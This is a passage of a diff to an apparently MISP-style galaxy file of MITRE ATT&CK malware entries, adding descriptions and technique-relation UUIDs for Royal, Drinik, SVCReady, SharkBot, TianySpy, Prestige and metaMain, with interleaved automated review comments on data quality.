+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "802a874d-7463-4f2a-99e3-6a1f5a919a21",
+ "value": "Royal - S1073"
+ },
{
"description": "[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)",
"meta": {
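Review bot: `mitre_platforms` for the new Royal cluster lists only `Windows`, yet the description (and the Trend Micro ref on Linux/ESXi) describe a variant that targets ESXi servers; check whether the upstream S1073 object's `x_mitre_platforms` really omits Linux or whether the generator dropped it, since consumers filtering this galaxy by platform will otherwise miss the ESXi variant.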
@@ -33711,7 +35102,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0138",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf"
],
"synonyms": [
@@ -34631,7 +36022,7 @@
"https://attack.mitre.org/software/S0144",
"https://twitter.com/ItsReallyNick/status/850105140589633536",
"https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf"
],
"synonyms": [
"ChChes",
@@ -35273,6 +36664,124 @@
"uuid": "17e919aa-4a49-445c-b103-dbb8df9e7351",
"value": "POWERSOURCE - S0145"
},
+ {
+ "description": "[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)",
+ "meta": {
+ "external_id": "S1054",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1054",
+ "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/"
+ ],
+ "synonyms": [
+ "Drinik"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "1d1b1558-c833-482e-aabb-d07ef6eae63d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aa78dfd-cb6f-4c70-9408-137cfd96be49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "351ddf79-2d3a-41b4-9bef-82ea5d3ccd69",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "73c26732-6422-4081-8b63-6d0ae93d449e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1c95426-2550-4621-8028-ceebf28b3a47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "d6e009b7-df5e-447a-bfd2-d5b77374edfe",
+ "value": "Drinik - S1054"
+ },
{
"description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)",
"meta": {
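Review bot: Drinik is an Android entry, so its 14 dest-uuids must resolve to Mobile ATT&CK technique entries in the attack-pattern cluster rather than enterprise ones; several of them (`32063d7f-...`, `4c58b7c6-...`, `b1c95426-...`, `b327a9c0-...`, `c6421411-...`, `d13fa042-...`) recur in the SharkBot entry added further down, which is consistent with shared mobile techniques, but the check is worth doing once for the whole set before merge.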
@@ -35374,6 +36883,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -35841,6 +37357,194 @@
"uuid": "92b03a94-7147-4952-9d5a-b4d24da7487c",
"value": "SDBbot - S0461"
},
+ {
+ "description": "[SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)",
+ "meta": {
+ "external_id": "S1064",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1064",
+ "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
+ ],
+ "synonyms": [
+ "SVCReady"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "7230ded7-3b1a-4d6e-9735-d0ffd47af9f6",
+ "value": "SVCReady - S1064"
+ },
{
"description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)",
"meta": {
@@ -37089,13 +38793,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
"tags": [
@@ -37344,13 +39041,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "9ea525fa-b0a9-4dde-84f2-bcea0137b3c1",
@@ -37559,6 +39249,145 @@
"uuid": "20945359-3b39-4542-85ef-08ecb4e1c174",
"value": "StrongPity - S0491"
},
+ {
+ "description": "[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)",
+ "meta": {
+ "external_id": "S1055",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1055",
+ "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/"
+ ],
+ "synonyms": [
+ "SharkBot"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0cdd66ad-26ac-4338-a764-4972a1e17ee3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "16d73b64-5681-4ea0-9af4-4ad86f7c96e8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2bb20118-e6c0-41dc-a07c-283ea4dd0fb8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1c95426-2550-4621-8028-ceebf28b3a47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb4387ab-7a51-468b-bf5f-a9a8612f0303",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1f1337e-aea7-454c-86bd-482a98ffaf62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ec4c4baa-026f-43e8-8f56-58c36f3162dd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fd211238-f767-4599-8c0d-9dca36624626",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "9cd72f5c-bec0-4f7e-bb6d-296937116291",
+ "value": "SharkBot - S1055"
+ },
{
"description": "[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)",
"meta": {
@@ -37603,13 +39432,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c",
@@ -38478,6 +40300,76 @@
"uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8",
"value": "OSInfo - S0165"
},
+ {
+ "description": "[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122) ",
+ "meta": {
+ "external_id": "S1056",
+ "mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1056",
+ "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html"
+ ],
+ "synonyms": [
+ "TianySpy"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "29f1f56c-7b7a-4c14-9e39-59577ea2743c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3e091a89-a493-4a6c-8e88-d57be19bb98d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fcb11f06-ce0e-490b-bcc1-04a1623579f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6",
+ "value": "TianySpy - S1056"
+ },
{
"description": "[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)",
"meta": {
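Review bot: the `description` string of the new TianySpy cluster ends with a trailing space before the closing quote (`...(Citation: trendmicro_tianyspy_0122) "`); since this text is imported from upstream, the generator should strip leading and trailing whitespace from descriptions rather than carrying it into the cluster file, where it becomes a permanent diff-noise line on every regeneration.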
@@ -38556,6 +40448,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
"tags": [
@@ -38735,13 +40634,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e",
@@ -38763,6 +40655,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
"tags": [
@@ -38830,6 +40729,89 @@
"uuid": "3d57dcc4-be99-4613-9482-d5218f5ec13e",
"value": "PolyglotDuke - S0518"
},
+ {
+ "description": "[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)",
+ "meta": {
+ "external_id": "S1058",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1058",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+ ],
+ "synonyms": [
+ "Prestige"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "1da748a5-875d-4212-9222-b4c23ab861be",
+ "value": "Prestige - S1058"
+ },
{
"description": "[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)",
"meta": {
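Review bot: the Prestige description states it "has been used by Sandworm Team (G0034)", but this cluster only carries software-to-technique `uses` relations; the reciprocal group-to-software relation belongs in the intrusion-set cluster, so confirm that Sandworm Team's entry there is updated in the same PR, otherwise the galaxy's group view will not show Prestige at all.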
@@ -38885,6 +40867,223 @@
"uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870",
"value": "SNUGRIDE - S0159"
},
+ {
+ "description": "[metaMain](https://attack.mitre.org/software/S1059) is a backdoor used by [Metador](https://attack.mitre.org/groups/G1013) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://attack.mitre.org/software/S1060) into memory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)",
+ "meta": {
+ "external_id": "S1059",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://assets.sentinelone.com/sentinellabs22/metador#page=1",
+ "https://attack.mitre.org/software/S1059",
+ "https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm"
+ ],
+ "synonyms": [
+ "metaMain"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "143c0cbb-a297-4142-9624-87ffc778980b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
